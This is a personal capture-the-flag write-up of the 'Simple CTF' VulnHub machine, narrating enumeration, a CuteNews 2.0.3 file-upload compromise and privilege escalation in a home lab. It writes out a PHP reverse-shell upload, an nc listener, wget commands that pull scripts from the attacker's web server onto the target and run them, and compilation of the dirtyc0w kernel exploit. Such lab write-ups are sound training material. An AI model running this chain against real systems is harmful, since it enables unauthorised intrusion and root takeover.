Simple CTF Write-Up

Introduction

Simple CTF is a boot to root challenge curtesy of SecTalks. It can be found on VulnHub or on the SecTalk GitHub page . The challenge focuses on web application vulnerabilities, with one flag located in the root/flag directory. To complete this CTF, I used the latest distribution of Kali Linux for VirtualBox. Initial compromise of the machine came quick, however I had to do some research on privilege escalation before I got root.

Initial Setup

To setup for the challenge, I downloaded the CTF image from Vulnhub and added it to my pentest lab environment in VirtualBox. For information on how to create your own home lab, see my GitHub repo Thank it Forward. I used Kali Linux as the attack machine and put both machines on the same vboxnet0 network. After launching both machines, it was time to get started.

Getting Started

To start, I found my attack machine IP address using the ifconfig command.

$ ifconfig

This showed my kali machine was 192.168.56.106. To find the simple CTF box’s IP, I used the arpscan command and found it was 192.168.56.104.

$ arp-scan -I [interface] -l

With this basic information, I was able to start some basic enumeration scans. By default, I typically plug and chug some common nmap scripts to get started and see which services the CTF is running. These initial scans were scripts like …

$ nmap -T5 192.168.56.104
$ nmap -sS -sV -A -O 192.168.56.104

The nmap script found an open webserver on port 80, which means I should be able to interact with the machine through my browser. I immediately opened up Firefox and checked out the website. Additionally, I scanned the webserver with the dirb command so I could see an index of the site.

$ dirb http://192.168.56.104

Dirb found a few directories, but nothing immediately jumped out at me.

Finding Exploits

Doing a manual inspection of the website, I saw the site was running something called “cutenews v.2.0.3”. Having never heard of it, but curious about it, I did some googling. Additionally, I used the searchsploit command to determine if there were any known vulnerabilities of the service.

$ searchsploit cutenews

The service had a long list of vulnerabilities.

Searching through the vulnerabilities, I found there was a public exploit available for the exact version the simple CTF was running (2.0.3). I copied over the exploit to my desktop, and opened it up to inspect the exploit.

Reading the exploit documentation showed that the application was vulnerable to a malicious file upload via the avatar picture upload feature. To successfully run the exploit, I would need to create a user account, and then upload a malicious file to the “import user profile” option.

I created a user account, “hacker”.

The first exploit I uploaded was one of the Kali Linux defaults, located in the /user/share/webshells/ directory. There are a couple here, so I tested a few of them. Each one allowed me to do some minor navigation and code execution on the target machine, but I was unimpressed. I researched online for a better exploit and came across the pentestmonkey reverse shell exploit. I downloaded the pentestmonkey reverse shell and opened it up in my text editor. I made some changes to the exploit by adding my attack machine IP and preferred listening port where it says to do so. I chose the listening port of 4445.

Before starting the reverse shell, I needed to set up a listener on my Kali Machine to receive the connection. I used the nc command.

$nc -nlvp 4445

To initiate the reverse shell, I navigated to the location of the upload by opening the location of the exploit in my browser.

http://192.168.56.104/uploads/avatar_hacker_php-reverse-shell.php

This started the reverse shell, and confirmation appeared when my listener received the connection.

Privilege Escalation

Now came the hardest part of this CTF. I had a reverse sell on my target machine but checking which user I was with the whoami command

$ whoami

This showed I was www-data. I spent a lot of time running some manual enumeration with the things like…

$ cd
$ cd ..;ls
$ cat

Using these I simply navigated through directories and saw what was available. I also spent some considerable time running through my personal ctf playbook plays for enumeration and renumeration. To check out my playbook, visit my GitHub repo CTF Playbook.

I won’t waste time here explaining each scan I did, but if you’re curious do check out that repo as I ran most of the scans there. While this was the most frustrating part of the CTF, I came across a plethora of great privilege escalation and post infiltration enumeration scripts and articles. These will all be uploaded to my playbook, and to my GUI python CTF tool.

After what seemed like forever, I was finally able to get some traction when I used the linux exploit suggester script. To get the script to the CTF, I opened up a webserver on my local kali machine with

$ service apache2 start

I navigated inside the web folder.

$ cd /var/www/html

I then downloaded the script.

$ wget  https://github.com/mzet-/linux-exploit-suggester/blob/master/linux-exploit-suggester.sh

From here it was simple to go to my targets reverse shell, and use wget again to download the script.

$ wget 192.168.56.106/linux-exploit-suggester.sh

Then I made the script executable and ran it.

$ chmod 777 linux-exploit-suggester.sh; ./linux-exploit-suggester.sh

Root Compromise

The script showed the target was vulnerable to the dirtycow exploit. After attempting dirtc0w 1 and failing, I tried dirtyc0w 2. I downloaded the script to the target.

$wget https://www.exploit-db.com/download/40847

I used the gcc script in the comment section of the exploit to compile it.

$ g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow dirtyc0w2.cc -lutil

Then, I ran the exploit, which quickly gave me root access!

After checking that I was root, I went to the /root folder and used cat to read the flag. The flag reads…

root@simple:~# cat flag.txt
cat flag.txt
U wyn teh Interwebs!!1eleven11!!1!
Hack the planet! “

Leave a comment

Your email address will not be published. Required fields are marked *